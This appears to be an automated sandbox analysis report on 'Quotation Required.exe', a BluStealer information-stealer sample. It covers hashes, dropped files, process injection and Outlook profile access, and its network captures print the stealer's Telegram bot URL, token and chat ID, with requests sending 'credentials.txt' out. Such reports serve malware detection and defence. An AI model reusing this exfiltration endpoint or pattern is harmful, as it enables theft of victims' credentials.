Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    21/02/2023, 09:11 UTC

General

  • Target

    Quotation Required.exe

  • Size

    501KB

  • MD5

    c6479e3bcb864d87e5d93ff06ed15c60

  • SHA1

    af08bbfe61178ee821e85b1f09be975b732387aa

  • SHA256

    9842d23cef4dc305ab6b8cd1ade477e1186d94cfd18861e1c87a55aff4d04c40

  • SHA512

    c5f4b4638b76b963fe8b731a08c43f67d5a8c512262755f78eca27feea5004e348e85a913926f8afe73accefa6a680bba37207adb37880100cd2f8ff6509b1b6

  • SSDEEP

    12288:/YmibSNNCgbjT5hg1s5PiA8C58tpxxqVTEp1B:/YmQoz5hgSN8tpxAVEp1B

Malware Config

Extracted

Family

blustealer

C2

https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage?chat_id=1251788325

Signatures

  • BluStealer

    A modular information stealer written in Visual Basic.

  • Executes dropped EXE 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Quotation Required.exe
    "C:\Users\Admin\AppData\Local\Temp\Quotation Required.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3840
    • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe
      "C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe" C:\Users\Admin\AppData\Local\Temp\ovcnaiorxn.d
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe
        "C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3368
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          4⤵
          • Accesses Microsoft Outlook profiles
          • outlook_office_path
          • outlook_win_path
          PID:3580

Network

  • US
    DNS
    api.telegram.org
    lhiecmmdg.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • NL
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    lhiecmmdg.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Content-Length: 167
    Host: api.telegram.org
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 21 Feb 2023 09:12:13 GMT
    Content-Type: application/json
    Content-Length: 405
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • NL
    POST
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin
    lhiecmmdg.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: api.telegram.org
    Content-Length: 201
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 21 Feb 2023 09:12:14 GMT
    Content-Type: application/json
    Content-Length: 81
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • US
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    22.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.249.124.192.in-addr.arpa
    IN PTR
    Response
    22.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10022.sucuri.net
  • US
    DNS
    203.151.224.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    203.151.224.20.in-addr.arpa
    IN PTR
    Response
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage
    tls, http
    lhiecmmdg.exe
    1.4kB
    7.1kB
    13
    12

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendMessage

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin
    tls, http
    lhiecmmdg.exe
    1.8kB
    6.8kB
    16
    12

    HTTP Request

    POST https://api.telegram.org/bot5797428905:AAGaRRXGZN1d9GGFd3sE5x4uSpCGF0PU4m4/sendDocument?chat_id=1251788325&caption=credentials.txt:::WEYPCEWN\Admin

    HTTP Response

    400
  • 13.89.179.10:443
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 173.223.113.164:443
    322 B
    7
  • 173.223.113.131:80
    322 B
    7
  • 204.79.197.203:80
    322 B
    7
  • 8.8.8.8:53
    api.telegram.org
    dns
    lhiecmmdg.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    22.249.124.192.in-addr.arpa
    dns
    73 B
    113 B
    1
    1

    DNS Request

    22.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    203.151.224.20.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    203.151.224.20.in-addr.arpa

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\lhiecmmdg.exe

    Filesize

    54KB

    MD5

    208f168a8a01e2d071375e09c084dc5a

    SHA1

    e04b395d08bfad73c65997e24f4fb951a7837d61

    SHA256

    0ea519809172240457a3d0bdb4dce19d0456670355ff1ead6d9823a1e72e433b

    SHA512

    10f05cac53cc143ce0388e8cd3546e856ed245f3999aca51d2db1e2efeacfb7dc5a18192280ebcb4087208a9cd50e90612150712eeed2c68c5876741bfa940cc

  • C:\Users\Admin\AppData\Local\Temp\ovcnaiorxn.d

    Filesize

    5KB

    MD5

    162e0c2bbbccab38c10728759e5c96b7

    SHA1

    0f45df923464f98cc5f655af51f31f30646e164b

    SHA256

    8213a9356d16fc8d08625217bf8f5a95168bacf3dc1c0413820533f8a2aff10c

    SHA512

    0820e5ee0c3c2dacc596a8101a362ed53037c9560dc8b76d09db1798651cb1b09136e5438fb176cefb6fa81358bb3973a4ad05a2b61622453f5ed58beb17da20

  • C:\Users\Admin\AppData\Local\Temp\zeylacft.exz

    Filesize

    460KB

    MD5

    df3d012d61af20771fd15c9b906051fa

    SHA1

    2cd498b119af9cac981fd2a12e55224b8481f1ac

    SHA256

    a5c41dc9d73516047db56803ce3837afb830f990d01dd497494e24215a5597ac

    SHA512

    d27e5ad78d500d2300800a0b0d9302dd0dfeb367f2d1f983645c440950795fe883acab1c5056ddfc35e08d4ddf1f008ee3cc718e914a0e6b03d21fb475b09bc2

  • memory/3368-154-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-174-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-145-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-149-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-178-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-177-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-176-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-175-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-166-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-167-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-168-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-169-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-170-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-171-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-172-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-173-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3368-142-0x0000000000400000-0x000000000046E000-memory.dmp

    Filesize

    440KB

  • memory/3580-152-0x0000000004EE0000-0x0000000004F7C000-memory.dmp

    Filesize

    624KB

  • memory/3580-151-0x0000000004D40000-0x0000000004D50000-memory.dmp

    Filesize

    64KB

  • memory/3580-150-0x0000000000760000-0x00000000007C6000-memory.dmp

    Filesize

    408KB

  • memory/4796-141-0x0000000000530000-0x0000000000532000-memory.dmp

    Filesize

    8KB
